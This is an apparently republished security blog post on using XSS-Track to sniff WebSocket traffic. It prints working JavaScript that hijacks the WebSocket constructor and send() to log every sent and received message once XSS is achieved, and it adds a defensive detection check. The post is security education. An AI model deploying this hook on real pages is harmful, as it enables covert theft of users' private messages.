XSS-Track as a HTML5 WebSockets traffic sniffer
That being said, developers must know that using WebSockets will always come with some security issues. Just to name a few:
- the client can be spoofed (it doesn't have to be a browser)
- the ws:// server can't be trusted (MitM attacks)
- you need to handle authentication yourself
- communication over the ws:// protocol is plaintext.
What could go wrong?
There are many possibilities, but for today let's focus on this one: it's important to know that WebSockets (without any additional precautions) are not a channel for sending restricted messages, because e.g. a single XSS flaw on the client side could reveal all those private bits to the attacker.
Demo
How was that possible?
No rocket science here, just modifying the built-in WebSocket object:

```javascript
// captureWebsocket is an XSS-Track option; log() is XSS-Track's reporting function
if (captureWebsocket && window.WebSocket) {
  // add a logging 'message' listener to a socket, once per socket
  function captureRecv(ws) {
    if (typeof ws.captured == 'undefined') {
      ws.addEventListener('message', function(e) {
        var event = {
          event: 'websocket_recv',
          from: location,
          data: e.data,
          url: e.target.URL
        };
        log(event);
      });
      ws.captured = true;
    }
  }

  // capture sending: replace send() on the WebSocket prototype of the tracked
  // frame (this.contentWindow is the iframe the tracked page is loaded in)
  var captureSend = this.contentWindow.WebSocket.prototype.send = function() {
    captureRecv(this); // in case the socket was constructed before the constructor was switched
    var event = {
      event: 'websocket_send',
      from: location,
      data: arguments[0],
      url: this.URL
    };
    log(event);
    // pass the data through to the untouched send() of the outer window's WebSocket
    return window.WebSocket.prototype.send.apply(this, arguments);
  };

  // capture constructor: every new WebSocket in the frame is built by this wrapper
  this.contentWindow.WebSocket = function(a, b) {
    var base = (typeof b !== "undefined") ? new WebSocket(a, b) : new WebSocket(a);
    captureRecv(base);
    base.send = captureSend;
    this.__proto__ = WebSocket.constructor;
    return base;
  };
}
```
As always, you can see the source code yourself.
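As an added example (not part of the original post or of XSS-Track), here is the defender's side of the same trick: an application snapshots the WebSocket constructor and its prototype.send as early as it can and re-verifies them before sending anything sensitive, which catches the three modifications the hook above makes. The `window` stand-in, the `FakeWebSocket` class and the `wss://example.test/chat` URL are constructed so the code runs offline in Node; in a browser you would pass `window`.

```javascript
function snapshotWebSocket(win) {
  // Taken by the first script on the page, before any injected code runs.
  return { ctor: win.WebSocket, send: win.WebSocket.prototype.send };
}

function checkWebSocket(win, snap, socket) {
  var findings = [];
  // The hook swaps win.WebSocket for a wrapper function.
  if (win.WebSocket !== snap.ctor) findings.push('constructor replaced');
  // It overwrites send() on the original prototype.
  if (snap.ctor.prototype.send !== snap.send) findings.push('prototype.send replaced');
  // It gives each hooked instance an own `send` that shadows the inherited one.
  if (socket && Object.prototype.hasOwnProperty.call(socket, 'send')) {
    findings.push('instance send shadowed');
  }
  return findings; // [] means nothing detected
}

// Constructed stand-in for a browser window with a minimal WebSocket-like class.
function makeStandInWindow() {
  function FakeWebSocket(url) { this.url = url; }
  FakeWebSocket.prototype.send = function (data) { return 'sent:' + data; };
  return { WebSocket: FakeWebSocket };
}

// Re-creates the hook's three modifications on the stand-in (without any
// logging) purely so that checkWebSocket can be exercised offline.
function simulateHijack(win) {
  var Orig = win.WebSocket, origSend = Orig.prototype.send;
  var hookedSend = Orig.prototype.send = function () {
    return origSend.apply(this, arguments);
  };
  win.WebSocket = function (url) {
    var base = new Orig(url);
    base.send = hookedSend;
    return base;
  };
}

function demo() {
  var win = makeStandInWindow();
  var snap = snapshotWebSocket(win);
  var before = checkWebSocket(win, snap, new win.WebSocket('wss://example.test/chat'));
  simulateHijack(win);
  var after = checkWebSocket(win, snap, new win.WebSocket('wss://example.test/chat'));
  return { before: before, after: after };
}
```

The check is only a tripwire: injected code that runs before the snapshot, or that also patches `checkWebSocket`, defeats it, so it complements fixing the XSS and keeping secrets off the channel rather than replacing either.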
Update: I've just found out that this technique of manipulating the prototype object to change behavior actually has a name, 'Prototype Hijacking', and was used by Stefano di Paola in 2007 to hijack plain old AJAX communication. Of course, JavaScript, with its prototypal inheritance, needs to have this kind of 'weakness', and I consider it a brilliant feature of the language itself. JavaScript FTW!
Published at DZone with permission of Krzysztof Kotowicz, DZone MVB. See the original article here.